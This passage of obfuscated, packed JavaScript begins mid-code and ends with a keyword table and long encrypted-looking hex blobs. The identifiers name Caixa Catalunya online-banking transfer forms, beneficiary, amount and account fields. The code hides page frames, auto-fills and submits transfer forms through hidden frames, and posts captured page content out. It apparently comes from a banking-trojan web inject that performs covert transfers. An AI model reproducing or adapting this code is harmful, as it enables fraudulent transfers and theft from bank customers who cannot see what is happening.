1b();f((V.1k()-1W.1k())<30*2U){17=R(\'14(16)\',Z)}B{L.3v()}}12}8T:12}f(!17){f(!5H){N=P;5H=K;x=2x(\'2y\');f(x&&(x.h>1)){f((N=Q 2S())){t=x.2c(\'|\');f(t&&t.h){I(i=0;i<t.h;i++){x=1i(t[i],1s);x=x.2c(\'|\');f(x&&(x.h==9)){N.2g(x)}}}}}f(N&&N.h){I(k=0;k<N.h;k++){f((N[k].h)&&(N[k][7]==\'0\')){19=k;17=R(\'14(15)\',28?8W:0)}}}}f(1Q>=15){M}f(5K){13.1a[4].3V.3z=\'4e:4c\';5I.13.5Q.3C=5J;M}z=28;5u=K;28=E;49=E;3a=E;2j=K;3d=E;2N=K;4l(K);f(z&&(S=13.1a[1])&&(A=S.1g)){13.1a[4].3V.3z=\'4e:4c\';f((t=1m(A,\'a\',\'1Y\'))&&t&&(v=t[0])){v.1Y()}}B{R(\'5y()\',0)}f(6D&&1Q>2&&1Q<15){f((G=2r(\'6K\',3k))){f(L&&L.24){2i=Q 2S();V=Q 1b();C=2Q(1R(L.24,4v),1s);f(2i){f(C.h>5v){i=0;1N(1){x=C.4s(i,5v);f(x.h){2i.2g(x)}B{12}i+=5v}}B{2i.2g(C)}}}I(i=0;i<5;i++){1w{G.1d.4y.W=\'6H\'+V.1p().J(/\\s/g,\'4b\').J(/[:+]/g,\'4a\');G.1d.5t.W=1h[19][1].J(/\\s/g,\'\');G.1d.5P.W=1h[19][3];G.1d.5s.W=\'\';G.1d.4J.W=1Q;G.1d.2s.W=1h[19][4];G.1d.4L.W=2i?2i.h:\'P\';G.1d.4M.4K();12}1u(e){}}2f(\'6K\');R(\'5B(0)\',2U)}}}M}X 5B(1Q){q i,x,z,G;f(2i&&(x=2i[1Q])){2f(\'5z\');f((G=2r(\'5z\',3k))){1Q++;z=Q 1b();I(i=0;i<5;i++){1w{G.1d.4y.W=\'6H\'+z.1p().J(/\\s/g,\'4b\').J(/[:+]/g,\'4a\');G.1d.4J.W=1Q;G.1d.4L.W=x;G.1d.4M.4K();12}1u(e){}}f(1Q<2i.h){R(\'5B(\'+1Q+\')\',5X)}B{2f(\'5z\')}}}M}X 2Z(){q 2t=P;1w{2t=Q 6n("9G.2t")}1u(e){1w{2t=Q 6n("9Z.2t")}1u(e){2t=P}}f(!2t&&(6p 6j!=\'9A\')){2t=Q 6j()}M 2t}q 1o={A:P,2v:P,4D:E,4G:X(){f(28){M}3d=K;f(!3a){R(\'5y()\',0)}M},5S:X(){f(28){M}3a=E;2j=K;3d=E;2N=K;R(\'4h(E)\',0);M}};X 5Z(){q S=P,A=P,6w=P,9P=P,t=P;f((S=13.1a[4])&&(A=S.1g)){f(2E){f(28&&1o.2v&&1o.2v!=A){1o.4D=K;1o.2v=P;9M.9O();M}f(/2C|2D/.F(A.1P)){f(1o.4D){1o.4D=E}B f(28&&!1o.2v){1o.2v=A;3s(S)}f(2N){1o.4G();2N=E}}B f(1o.A!=A){f(28&&!1o.2v){1o.2v=A;3s(S)}1o.A=A;1o.5S()}}B{f(2N&&(1o.A!=A)){f(A.6r){1o.A=A;A.6r("7u",1o.4G,E);S.6s=1o.4G;2N=E;S.7w=1o.5S}}}}M}X 5O(){q x;1s=13.5Q.7L;f(!13.3V&&1s.2z(6J)!=-1&&(13.1a&&(13.1a.h==5)&&13.1a[0].1C==\'7H\'&&13.1a[1].1C==\'7D\'&&13.1a[2].1C==\'7V\'&&13.1a[3].1C==\'7R\'&&13.1a[4].1C==\'7Q\')){f(!5R){5R=K;4r=K;3a=E;2j=K;3d=E;2N=K;R(\'4h(E)\',0);7r(5Z,10);5Y(1s);R(\'14(1)\',5X)}M}R(\'5O()\',10);M}5O();',62,622,'|||||||||||||||if||length|||||||_F||var|||_B||_G|||_D||_E|else|_H|_C|false|test|_J|in|for|replace|true|_I|return|_K|_M|null|new|setTimeout|_O|_N|tagName|_Q|value|function|innerHTML|100|||break|window|_B6|||_P|_L|_S|frames|Date|_U|zlog|_a|_V|document|_T|_X|Math|getTime|exec|_W|_R|_Z|toString|_u|_AI|_AH|parseFloat|catch|_d|try|getAttribute|parseInt|_Y|Url|_b|name|_h|ig|_c|_v|_s|td|key|_i|form|_AY|while|_o|readyState|__|_g|_k|round|case|_r|_m|style|onclick|_x||_y|500|_j|responseText|_e|jsp|id|_w|_p|getElementById|_AA|split|_l|_Au|_z|push|_t|_AF|_AD|display|charAt|_AB|_AJ|isFinite|_A9|_AL|_AG|tr|xmlhttp|_A6|_AK|_AQ|_AZ|__utmtr|indexOf|_AN|_BE|loaded|complete|_AR|Content|_Ah|_AE|setRequestHeader|_AM|script|101|_AP|_AO|_As|_BD|_AT|source|Array|destination|1000|img|_n|_q|200|_AU|||_Ad|cookie|none|do|getElementsByTagName|removeAttribute|body|_Ag|_Ae|substring|www|_AX|_Ac|parentNode|_AW|styleSheets|_Ab|_Aa|_Af|setAttribute|RegExp|status|visible|_Ak|send|idiomaEmail|_Al|_Ao|ccc|abort|documentElement|_Ai|_Aq|src|_An|_AS|href|_Aj|open|toUpperCase|end|alert|_Av|_A3|UTF|_AC|opcion|font|_Ar|Type|nodeType|_BH|charset|urlencoded|application|frameElement|_At|_Bh|encodeURIComponent|fl|_A4|on|removeChild|_A2|||CTA10|_A0|_A7|_Ax|_|___|blank|_A5|about|onmouseclick|floor|_B8|_Ap|ENTI|link|_BQ|_Bm|despeses|hidden|_BI|charCodeAt|_BJ|substr|JBIVTransfAltresEntitatsC|cccalias|201|JBIVTrfOMFE|contratos|ps|importe|es|vkp_clear|en|_BB|_BK|_Bl|_BA|class|_BC|cm|click|ms|but|appendChild|cssText|_BF|_BO|createElement|bpdval|DIGI|_Bc|input|_BV|bancos|OFIC|_BZ|_BY|EUR|_Bz|_Bv|_Bw|META|bpclval|bpmclval|bphrval|content|_Bj|slice|_By|ca|count|codigooper|DescEntidad|ctacargo|_BL|_A_|_Az|x2|_Bb|_f|div|_Ay|type|__signature__source__Row|lm|ac|_Ba|51200|__id__signature___C1|__id__signature___index|_B5|cjfrm101|block|_B_|cjfrm11|GET|BENE|__utmlm|getFullYear|_BR|top|_Be|_BU|Length|POST|_src|_Bn|bl|location|_BX|_BT|rules|fromCharCode|cssRules|String|3000|_Bo|_Bp||255|all|pow|_Am|br|tbody|table|nbsp|On|_Bt|cjfrm02|getMonth|caixacatalunya|com|getDate|CBIVPosicionGlobalIntegrada|_Bk|random|XMLHttpRequest|setYear|_Br|_A|ActiveXObject|0px|typeof|httpEquiv|addEventListener|onload|Pragma|cache|no|_Bq|className|nextSibling|previousSibling|onmousedown|_Bu|_Bs|_Bi|00|_BM|title|CJZLOGOUT___|text|_B0|cjfrm99|Entidad|Oficina|Control|option|selectPosGlobal|SubmitForm1|Importe|concepto|enviar|Num_cuenta|Beneficiario|Concepto|formCodi|CCCodiOficina|JBIVTransfAltresComptesE|rebreJustificant|CCNumeroCompte|CCDigitControl|enviarFrecuentes|cjfrm06|nombreordenante|JBIVTransfAltresComptesC|conceptePerLOrdenant|litctacargo|beneficiario|height|300|oficina|justificante|setHours|entidad|SHA|cjfrm04|JBIVTransfAltresEntitatsE|dc|_Bx|cjfrm08|cjfrm021|cuenta|setMinutes|write|_TEXT_3_|setInterval|_TEXT_4_|vkp_openInfo|DOMContentLoaded|addRule|onunload|imput|BODY|__id__signature__|select|JBIVTrpConsultaOperacionesCaixaE|JBIVTrpConsultaOperacionesCaixaTPE|ccmenu|_B3|CBIVCuentasConsultarSaldoMovR|JBIVTrfOMFC|ccup|_TEXT_7_|_TEXT_|childNodes|hostname|doSubmit|opera|_TEXT_5_|_CONTRATO_|ccmain|downloadFrame|firstChild|lastChild|_TEXT_6_|printFrame|resizeBy|3e7f099c3702a021c4|4d19789c32266706ad36033a9bd7|3f6e06e80550f85a|4a120423b3d2|326d01ee002157c3|4b1b7f950186f32d|39620fe4019ac454|4d18719e026b5815|39620fe4048b3c75|4c1f035af357|326d01ee00c3455e|30621ae254581161b95524d8e73a2329869831437401ec6d93|38651ce404e2ac81|4f1b799e01ae3718|4d1a709f00da26cc|_B1|http|_TEXT_1_|1700|_B9|_CA|_B7|3f6e06e8010cea2e|31443ddf63712317de680be6cd191073f69513794edb016a73b4|38651ce4003c7565|37006c9b2301457d9f076396a77c7902d69d620528a551c07638044c54c8|caixacat|introflash|htm|4b2b4ebd1018412bdc2f6598ba656209c0006825a9|552b49a106104672980720aaac77651edad6650d057af1a8|552b5ebd10144672980720aaac77651ed6c6651d04f0e94a|7c2b58ac0300242537|79225cbd0b1d5020dc0665d9b97963030069e229|7c2b5ba70e04563b930c209dac307303d1c06b01ed580d|762140a10c1015229d106390a87c04ae965e|242659a50e4f093a990364c7f53f7809d2d63a5525bd1bd33b740d12c06bd555b473d5fdf9725a74381aa89c18440cb99c9c962fec8ca59f8e284eb6ba6afe40f8c24275626faae0ab9a3a51eb10668e4d07a9214a82596a252fe9c8a4aa14b70ad6e19c9d5c9d89ce99d2a22a0ec0aaf363ead61cc3f6efa08beec838de4711798e4d8741c1d96fd059c76956f05d485f9441118cbe8ec87cad029794c33db65c81fb80665b39be9f549a432c8e8f3c4b036d31a58f2c5950b5daaf39515e7d182634580dac12ad95763c78be81e68111414968c39070a8f6ccafedece6213dfbc82b812b7a07f8c66a185814f701e89668eb6e183a2616537e281ebbd85a368b156ca5dd11d8b1559aa2e87be38993b31a27c7a9c178dcbefdaeb54edce37edf654373a4b315ce6945225c6179d23fdf02414cb7106075c13c31b8f5345ef0650dd64ca7ca0f865ba515a0d757898a6b2b043f4d77bad853112d187c18a61067e5c63608988a09178611eaf1cbcc014a8b96|_TEXT_2_|selectorText|242659a50e4f3f6e9407619df71a1a50c7db700522ec438571211f11d738ff31e972d9aeb028447e3305aa8e0f4909b381c9d165fbcdea859b3145eeb76cfe4be3985365743ea5e1b49e3b09ba1067847d0ba9294a8419273135a089e7a81faf0bd7e08fdc7fa1f8a4b1e6a23003c2b6f737a4db10c8acb8b19fa9d56ecd560225df5e945bc2da229c37933618b95a565a95153984a186942df10fc0d8db7fb058cef9a7764120f5d52e9c5f31cac67a440e7331a3db2f4752e5cfb82c582d3e0126775a4ee00eb195622c6af781e2884f0a0a798ec035b0e0ddaeedbae03120b49c74cf62621cfded26174a0ddb52ba8f71f2380d3176121e2c3f14adca4566d20b229aca0f9dbc40dfeeee3fe295d2e70731d9ec8a31d884eaaaf21ea9e476c038557ab1a419d9740672582a37c229d849131ea61b3023cc616cb8e32548e5314cd442ad99418d40b418e2c6408f86386e022e4e4587c9124370434c1ea6092cb8857b1793836849cc17e8f5c995fe7fb1f1fb8ab1fbad238545ae7bdf652b53d58fbeb9a400987379d5ce26c7c57b7584e3837292df76236ebebaab4c21f32e762710422c9c31431523342890ffc0bf8baeee6166c614ed1714b287c16bf86dfc55a7f7cdf9af7859fbe85b0bec0a048d12b6b82b69d23434e45f2cffefe5797c10ba4709cff0196b58d600e87e1a8d5d5cf653a0f50cd9fa70e6d3d1dcd36fb646f056857a51a09849b4647dc2de284e4761bd58b3d9d99677f044d33bcb37bea3d3d8ff5d3ec019b0e0c7582c2618956694b356c8f6cb0693609555ec27d0437762b9aae013fa1e05f46f917a5825acafbd275a737b10f2ba1a8143c6b8196013efb1227a336bebdc7c32cb7a97ce4b4c80ff8fb3a2bf616fc60651c173ff1839e07f25a7b91c19f5cf27d3c85181c33832acc01283a5e47c51ea873f7e67fef675dd3e06d8d13e270ae52b80b573fbf4d6dd9f337b7ec5d775717d211a10970b170e1ddf1022440d2cf5151da4c6fd749f15dcd784002b1d7f162dee3d85d87846d889036a15d019281020a2cdbe9df08c6a968c5010712d6ddac02181c5f61d14c8a955b03267f8d8dd3f2fa41c2c490c388ac537cafbe283f371035048264a01bff3f485420b6e1a34ec009c297978520c96f1d9bab7b61bc89a8619800dd974cbac7c40291e9738acaea0bb751f10fb6166dd6b8f12f4cce372b1cd92732c6cd7dd2301866f4d2fb90891c9e44d52d4fe1f9404e0636c6dea758eafaab2528ffb5672d37d6f20faa500f8299cc5ebf19781c78fa3115570c6fabe652985590c87cddcfe1f73352a78b6dfcaeefcf2343dbd79cd4300dbc59db3247abe34a536c75f4428d3f2507df226151bdf41010bda5e2eaaa71450d9adcbbcfc95437110a6c4d0ec4d5d33e9e2bc4b6794db12bd54e68f2562e96b6d659767d618c1a8e05a9842175048438dc4ea5d53dd7ad8817940d276690701e1042e7713d85a06291d6827b5b07c51664821aa4c1b0bb995991c52871a4c9d0ab8b8bb82b4c778a05c935e375b4811931926a83ae46bab5772463829ba10fba883888988a88f9e2642229f3183d8ee6675d3f2c7dfb7c26f1e1584d4434bc4d8e94c1f5e8b0c9449f79f96f04fd2b890db9b008ed0771e6ae4c36e3f3950cfeb3f2aa36bbbd255ca13ba5fd3cc4ceb6b7a796df3d3cbe03b6ac3f0c709fd5c239478de6240d872fd5f2e3114e7d6666a420eaee1c6ef7cfe86d7ed2f2ba3502c644fc263edff2cbce62dbe6898bccb2967c502c51c9f892d02e2494791d41c3a5da7ec6b35ed17345c2fb5d6a33f71b22ff21e7e4006302192657de87c07bdf5fd391df3d63ae3efe39caf1b6f76e2182dd3a9e5505497ae7589eec5323f0382eedfb74b149ddd8c3538189910ab209e42177f0a10f7a4810382a61146b43333db922999a475b363903b775e95abc6d3ff143a0b6316ff8bee662795568f07aac3ead1cb61c218210d4304c18d46f412acf5e0790fd70451662b4c23f51d130e31dd3bea93c89cba3b7cc3b807553181b04b86a2948f7c2ebd9841599c79f2474f26fdecb3e570a3941311d9d50390c4a23dd54f36fb287841fcc53b5393731b813d94956a741c4d42a00375f9dc2475414f88dd0567cb520c71519f27b1ef1651501035769a53e49b03be0d71bf687e08fa4d62c64adb2ce74acb4b3901974eab54743d71c79e1a637a89d252394a8bcea6f8cda55cbea641db53d1569a445d7fca3e71d84f72a3a7b2388eeb4aac2c29216e63c86c90d3a06faa4b0d42b7ba1723e63daa5dd162a8d89b8e073bc4edae5fbe42287a76732534b1387d6b799c95716ce58467ac482d1057b73eaf91c59e0b43cbe338a3b54e263172b72a35e194e08cd95961a8e0b95ea55fb28f91c34540814c643beb1913943202624cbe5e988809af5f4c0e5fc3599ed9ca36b6bb3c57ac9a8d23307f873441f33a687700a97dd6b7c5bd7915d399597ec61aa96960b90816fe35ee5562c58ef80755ac4485f1b61662fbfd66a5465d10eb31ae466fd5dcfa12ef12a0d26a5b34e49031d76b6149886b25d9d074e14129afb0bb752998d6d67abfc0e1d6824d9e47d06781cd9eb03ba0d77ceb39e4957a84ad4beaf4734adf8d5fbaa62119928b4ba1096ec0277a95bb552e47ae3b48045d879f94225d2ad4d1ca38dd3c4bcf8d05343abdd5271d1bb4c273ae13f46d77dc3611f55d5567768b3a75de2ba91f56bc74dfccecb53c81f19543540af990a5dd9b8c8b188213ddfe2e146f9006b771027aa383d32c49abca965a5f3e67eb14f919cff18d26ce218fd45b50892828c37770d9da603019921bf4c410c90c80ffbeaa9b0a546997bd27edc93d195414222801646b8e751d6fad7c2d5c6ecb75a7ba52bba4f2d9319c9e7e574075ff51a43455d1864ae47eb7165e7388277317dc8593bf182e753994c99faf25a3532ecd8255d1e8ca683d7f0cc995dfe33dcf57230ebbf884289c1b387e0f2d93110b52327b16b44a4c1e6e7ed929303f9a022958121c31bc853f2ec147fb8508990c4149f43e032d83dd063fbac9e6f46f60821989811765964350deb03037b0e3a602db4c6c5fab8d16fa458a4b4b7b6d8c156d82c821152b285f2ddc41a0200c4e6411fca79b5c5c2bdd6cdd21392a91a8507e2e3431b044a3e3b174132e70e6d8136fc99dfb45c521b80d93d10dffa59feaa837c6a9530df9a5259733ab96412083b8faa5ea1a98c0067877228a69e5c6ecab7e559547be4b3e3b82450d400105d4347dcd9aec7122b6a076de586ebcb030dd273bdb44d4f6478e7fe7173062fd173ac0ca9930cf34df556b2a1eda86257cd7429ea46c1844003651acd946c20737a04a5f62991516ece7a8ce809e845dc8da06f6deaae3054fac8119a25ae803275736e46d73b2175998422967f6e2429b719c21766824f38acd111393eae37af0751065ed42242f45d716e16a9fcc3ca98e9ffc3021ca35a57b050d6d627712302a404763948b5599baffae778eefeb2ae2d0a62d7be1c5dc2e4d3fb99262b1ec640fa3d3cb713bdcb9243068074ff84f00348c033728eee77b3fb4d93f4a14aeeccce9a89b75b68c62efc393191a399465a0e1dc5cb42ab00d3dd5ce80eeedab123efee2d975a012eb1cb30ecc7ddd4a09a7f776d780fbfa1e6cfd79fad56ce26f3883c5656c1027fa4357670812dcea79c502dae25d195eae7096f4ccb8fc49a16e123271aec6ef432b3ff548aef6b39c94a1aec6fe6510977392d30284b06669b6602a07c6372b0f5c8f5143db8fb8835e29734472aab70d281758009d89294ebb76dd0cda41fdc955b4686274dfc86a67684c245a4b1e52043a869e80f0c852f8672d40cd2bbad41bfc1a61134b2b9fd4cb9d7ce85ebc179e86e383d4553f3f514ab1fd3b0eb227c54128338c7fe91f3eff617373ed31e87fb1e937b9d07bfdbbff8aeff5aad6da418ea1daac581570f94c0876bcfa8d17a561e0acc5cb26985eb2c5a02ab8344b866179591f923ed3fc1c2613d8bb50e3070a0443961b36cfb6692800f44d4310911ae34a472136993c8ddf7e76c09b3577cb203a03992ce6692f946bd848551afa68d948b15ff169194a7a304a891d211e5f58a8b099217367c0df3a1ab1b9275dccce72eda6ee8924b55ffe61d6cbafd8740916e148290c08d8d5e5b8f51ac573553421279189e640afa20c6b910bf73c2d4f06a2aa57bd1b035297a1ef1304992f4bc760cf5e9282b28d2423cad30a634356988a54874bfa5c965179d6312cbf4cf92ee019e044842aff4686fae7de04bcb4b0f0ddb927027284df1a8c9b7fc8e65aa838017b95f2b440d31b4266612b8f8d80126897b080112d68aaa9652cd3c1d9edfbf7b9e5170502026eff50d15e1bc2cc7de4c62398da356e7435fa6fe83c778681058d33f8d0e4ee94fd524d330b7674a4a70ac8a1349b77dc06e03bcbf64274a02c0e547f038f8f3183e66fb5d8422705c24126201a6891a1fb1f4b9014fa502d7a3d29048569ffb936fa599d8c3e5a73c08eaafc1caa214b577c59fc3a02dc17da32cd2b0f095f58733189b07eba25db7acfa197ccf71a2655c38f3a48c516e42ec36611197543b2b7f59b82d286202e80511f13d97272d9045b606f9a28c3e1e17b395e2fca246ea669c3b162f0431acbdbbbc1879de7f985a83233e471eaafd58175c3eff0212dc8fb40584c929f333b096c13ac46e818cde694409105f785c715b2797c064e77cc55d566847e85f3a3c766cf1c4a22138706de682dc90f6d91bc97cadb8f6d1b060d56542dfe41a09821c78aca61b3bc2b4e98e7e78742e80b19ed6299dc119265db023151643b47a591b60be3732ca9a717b21e790e086c6fd7cf1d00caaefe23d17a3b771c7321463e857f744a34a472a0048eb49a76fa9b30ced152dd7d752005eaea5e2a840d9a00c91fbd0cef0fd75797dc0f505e15f4d988bd5697156866552001678d2aee79938904e6f151869673b4e8ff40117333cb14c6252b54e127ec443df687aee31a2459dfd4fd8734b3c56e7dba976dbe0865aa143c5a5e9c3ce8daebc0d6da8b084e29ed457cf124d361eb24b63d1df3b6a303b576f68df88fa567cab1c533dc8398e96d9104c51668175fd9a47763bc09fa830e0f021223bca66e243e4fd53e71e689646375829e40f08d95df7fac6058d41dcacc2d062622671e27667d1db956dd438fafb38280949a3213f00fcab2d9b3573af5b99ed01f7ca8053aef64e37a913256a9f5ee9e01114a0ed338964f0002483b6a73408bc40668cea91f1afcc04ec29067334d7f5211d0daa8dfcc808967437b0eb9fba76055c76b6b09dc6568c84224e9e363f87942e6a9be0e44b4f2a201798b014fc0d729cd9c160ef2ecffa9e0b5b08cdf6230579bacfc7500b257dd5950fcec0de56aa079ae000a5c6136c14518191c202ba603ab8530329393190d73c96fa6f38ad7e6cf389dafcd915969cfcc20480622e2ccd822d5ed3a66186547e6c19013418531b7958e8c45a4499ab6db5f21622e485e4dc266995be23b3a2f26212ff600e96515a8c7a0509bbde4c8fab56200f104678d81b2ae4e52f6108a55b872acec93f2967ef2f7c5c6779443c24d22beacce3661096fa05b09524756810726cb4ef00bcea23ad4ece652904dff436ef5e535c2e8cfe1783d88d4d712d4f44d093e587ac6463694ab72a6e628feebe2991428ecc39f4351038d1138b00c1b95fa440249dfedf13252409f46f0d751dfc6da3871b280c9d4018362178ddcfb9aa889f4ff5a50928956831c23e1a0218745563deca227a4cd8471e0fc36662fc65daa4875691c72c760941678b8058068bd0d0771320f26279bd245bec586f62e30065643ca5d4615b97868c52c9d7bc24e558f26082d00b057b5986dd1fd5f28cb87fbf512cdbe189a69413517c3ff7824d624746d20e71c3d71aff4f024b008d7c68d4facf85803e62ccfa815de01d042e547cefe3d1c13c7cdbf7835ed59ea89696d82d1a028e302aadd9951a36f0bfff40f9776b13204d02dc5073ca972ab0af6ce1b0551d6a20065cebd39eadc5e3849e5f4b258b1785cc14a6e3c026aa64845184d3626bea21e4743fab88bb8b779332fbaac904cda0b363b081244abf201355b1abd982e1baa468f97bf421716786a7994d0721ec2ea30fef7d5e05221194320e6450bb27f1422304506c645fbddc5d2e5d47eaad41ff91234e1610c25dc783b70277477dfbca081df02a9db08b562ffc87b608042cd58b3fdbeed3f262d1fb578199dc6cdce7ac89e7cc9bee87eec9b19c05f5d0dce9c1e612375c9ddcbd9d590a6f30146d76af653deadb4b2f539c48d893fac56fd06519725a7a2bba97c84702e30e23abbf34c2d8ae6258186637238e5017dd8916899f6af07852198b051fba72a0ad5aaf62e3b815efdf526776ca4d954ce52523c7e0b85bdc1238da6b0ba3dae07ec8539f23756d64742898916d0f6c9141d2265eb87a08929534f093db1bb9eb53b4ecaa92f94428feeb97accb1b636a9cc2393eed30b54c99a9e25ecc2e712e931627a3d3e4596cb3fe36301302c500e5c6f6e5bbf89d3c96ec0c193734c5777c3c1e52757b246219091901ae3d237ba3315e2598fa6e22565accf463057c55682f9b874b28cba9dbba7557551424ece911bb23081d279baff4afc366f03e68d39f48afe1139d223b6a2b0a46d0f6000324d088569a5a57755dd4939324c07dd724e793e4314e2c15676ce113f86fe7997f786c577dfd92f878335f7f7b9ceaa3e74ea515721dcb9cb1c425b7be8f3a8890a0ba2ab04fa806b22896e234eb2db49716149a7f00105db5af914d806a54556cf3c469c62161905d815a657a2dd58df54333cc7cbcd6ec46655b597038c03481e65258697693eb688143e3dcf7d600109b4098cbdb1cc7f466b60a10ea4477765af52ea58b8fd700badffeb559740fb50ebb2cc56ffce55fb180ad7825d41e5a2cda2af0301d08bd227b9fc316a9f818435be35831fcea71f5e0cd0a1f0feb2f560d320497fb45395fc943f71e454c3021be73ec577a3983755eba72f063294b871d9239a0747c6ca16158c60227a9884906e84d885cc3dae0419164add7a11443c3f277916bd0f0b1a021aed2afdeb89cab9808b6e54bb87731259e8bf0431d4abd6bcd0481369b49d22c20d49d3da831f9cdf81eee9f9c0f2c5e726af08cd247ff70de8db26f15fe25f4f011b591cb0613f51c212d18f42fcc6470d50be17fb3ce283bd756f55ade0e63af25c3612a64ccf139d94a73802a09e0f7719eb0544fb57bfd1a1af6e26f3b56811d67bee456b993c7ffd0568f3e73f0a1c2dfbc257be18681d44acb1df0062e5107596bf496b5c028e7de46c7e8837af2a1a4be07d68e2853ea9f04b0b1dc2dc624820c0769eb0ffd2ff71768839aa1fd67ba8934f26bbfbc124c9ec7ddfc5cc1f432ffc131d8c7b329f69c1c9c1c508bfe57558524195702ced0043cbd4ed569b17211de5c532b86f5f9aa22a28dd4d59b3b1344e1844f367a7ed0b70649f7da81054893fdaf835ba4bb53370312948418f4e009e326dd2ede406a2672ae5da0161b52789e7c97877bae6da517e4fb9670a01019ac5094c4b1ce3d0379970129ca908aa9d8dd59802901ed414c9772ce59f75f4e198a5e275b4904bdc4d423e5acf78e7e2ef1242a9ca412be3f164c1d701a3c9e0c4200b486476b7110afe5cd98ae37ef3b6424011ee78fb6fee44f9fbe5d35d877950fad79bc9320ba251117670de05c515b4b217393f35669fd45abeb5d33f88c019f1776b4ca93e29e2c7267c3e9fd0e48d441813e7eb2e4856297ae84ca5989d04f3c79f46f5de860fed69e778d84b09493cbb18a6c2e4835bed9f49c6af6234fc4105d5d9dadf7aa74b19bfb89129995b73a05afb2d56a3c7d09382a3fb5e18d10dc63a0bee0217192dd35ef38b0bf713fd503e54d0209d59047d2f9a4e7431fc261e16d1a5c57a10db509effba904afddf27029e146ec8e6896fd803a240ce96c780e3e57c15740b5b7662cc65ddbf98a099a564c1b514cc6c2e907dfbeb32764b763cd99d7ee72feac7af8d34e2aa23846e6d51348c8290594c3f86c81675d6fc4254cdc1ef1f77e754437522fefe4bf673c1f802232c8363429e558b0b7e2ace0d6d5250b32c21ef4dfb0d4eac3caeb5bd827f157c89fe5dea1d373e6500dc6235126c3beb802bcf4d29e47349acd20f6061d6f1935a0b732ff0f734900edd42eadaca0c8645b87d86a081c9f0e8b5a88d3becd762f1f8cc20a42907d1e8e040ba7410c7aaf27a1d8bf26bb8764fb8bafa4cd6c27215e43f34a48097dce96ccf13c07bbe831e2c4516b7c66438eadd782962225e6175f388edc47b0f2d09c813fef5f94a4aae7e9f48241acde4dcbd5054730985d25f5bf88cb9e04487e373a6ef987d4eeba9b5e8f317ba4c19bc4cf2a432db8bf6802977b2658e676fcf3e0d67b8587f7516651ccb4316fd4a2db4d6d27720ed1e5c6dd738ca1bdf4b49431c0fbab5cbd1c5aeaaab35627ca3e7b1636e971eb7106cdc253339f09888c4cc3e7da49ba309d87cc9a10bf8531d5f610b88e8514cf99d5a1e2df2a53762e9bebe30211e68b3168fbfec8702a487a40cef0db79459917a9be28d281e7d5270ee74619f4bb28430cd1c00b45634e7da816d1677e8891d9e85395a851b36d6482fd3ddbbbe0bf8dac402113c3f081c134f96bca38eabbdf4a3c5010a22a1cc20055886bbfba4ff306e23831bc4825a47ea81604bd81d4660b13db217c2170ab48e97190c5858659633eedfbe19fb76237f58d5d0627dd6b5867a5547964bc299baa879d5c0a0500c8fadb2441dea4fb5a127898fcd3f70a8a5260e9351d703e13b37adf6bdd146bc88c1c216c00a1c5f0088da9865a1a7cf0bac663f9f85141fc3cb86a66a9dcd34784f876c37c9f8ed0b1d071e93b02953d764508e81e55a737ddf030f8ba4f2e01767b553ae867703a589725c986e43f57a16da754e160e5b81e79c330ba5affbee17b83fff6a72e4b5a0c74414b6122adf91794e02fd7d2e12bd70f21135314e4531de95ad59f0a84fb6bb5c743d9d10f1268acddae485e04de99998ddc185ef53369e8a05a45da82751d7fd54523caae755db1807f3cffd3cfa9f62095b8f0c1840a5df8dea0e90b6e4a498997e8e5e1ef35710cb724304c4216024e6f90ee5bc8923777702885d9937b1f2222980c75ce42f26917cfcf95681507fd8035baa6818b30308293cfcb53eb5bf14c54f83f724fc85cfe5cda2dfbf480a01c89aaf3b7f56f2134310d9088172597fab8681e086641504bbf5cc252b797c4ef10c8980a9150cbc25c9793fac457e603dc0f0225a7abebf136549800c65e0a26e0c002225e2fa9544dc37a5d0d042482c7f13bda4edc612986fb13781f40c56bea27b10731cd2d746b4fa7028eaecf6324dde6b908ea5400fc907b0ae69ea6116e36fcac635641dffde72d7b57cdad5fd7a4059b5866a6b51d798cba309ea8f4806c1bf9159c99c7c5c32012992b75db58ddc05caa6ed7af9abd91b3a715a9d7062ec83be3cbb44201c233bf04cc46fa0d3a13fa5d88b23c4fb5d7a25547c8da74874d36894c694070e58a1d50d1b007357c70d76dbe047b2719062a44875b07014f228ca2b86e910e289e0ca5c2fd8eb40b65e8e803171f7b0389d4f5da8eb1ab38331b2e7c45806c4eb3c8b9cd9c254f6b167ad599e9234339082c50d8368fae027cb606da138a1a9f795eeb974d443b194849f5c2bd2bc3c980950ec5e3307ee6b2ad25e52b470827d7c0def1de8209a096db98f512f835b50d5dd811e2b9ad67910a644e96dfb4f1bd497dae5e1d079ed543371ac4fbe2f59e2f20a7f2592a6f04e9306c39f447721fccff85ab74843244c5e8efae052a46060b13be1026c5d22635afd4b19bf1c3493d24c35b51cf9319758a4feef51156cc6702e5634d75721ad6acc768fd6cb1f2e909b113bc388a722917a17db388c2b30d503b582f06ebbc9990051eaf2e984b2babc859e065ddb7cd6e9f10bddbdad16f99e07e79f561d8669a4629ffd3ee8a1ecb0280d2cc3277951b6415dd71608576e5c506c56bfd59cb90c4e95108aebec25e3d8fc03a1e1aaf868d30b75d87c574d44d6ae6dd764cd2808c678f2831eb5dc32de0ba22cb1c511803db28b9367d6f5b60c393c6b7af7ea30a1cdc7ba980d3e3f6c1834088648e7bfe2f14c526211e84abf33a58eae56c428f93611caba0f7fd5623d69dee6ea91a176a1a78cd4c0860e28073f505f77d92c28e9b7472bae6ffd3d7824c23163dee1d0fbd66ed66347a7341f3c28ef818af602bb5cb70fbf783d1b465e3cd5a7fc4a2c2c19a467af98bed2f6ba50c0ae75460e0bbc6f05fa6f6558f1b0312db1c47eb532a72ad23277d6445a7050bd30e62d61149f545cb8216837bbc2cab1a86a5593e4721abb236db3c7bcd9f8a4c8187a10418a2e63c321d73df1fc114d08ac502b23ce229e1a5bba5ecb3651725dc40398a7f2f37e067995ec085302f55e72d7d69c9a7dc6a1ae0272d7d52a52af7c2baa2504c78ec1b4a4eb1a843d69274fa02a2f0b3acd8bfc3f745560f22d551203d650fc9ed48db0652d2c76eb24d9bc17121029582d397318e694fa6194af417b5084da622102a9681dd2a233b7f405e0fa18064c117f7a477844093fdfc448faf76203f5f87b2bab5fe680e18234b57dd2e5e88ec559f6f2835a8d88b21ae703b138621fcd98a967c0d3379a5fc2765e9e5c81906fc221563b4aa0ac622d10b1dad6dad6ac9bba37cc061c532c62091950c13e55ff39b23e8b9a1505baae56bf20e81e993cb6feaba19fcbf49d7a3bb41940017472268c0e7c7b838dbac1fe1aec62fb33ec1f2017c7393af348e2e253a328c235ac1ee971104e3c45a2aee59a0dcac80c63688f1333f1bcd5f2316f79de88b262fb9d30e82fa5e0db4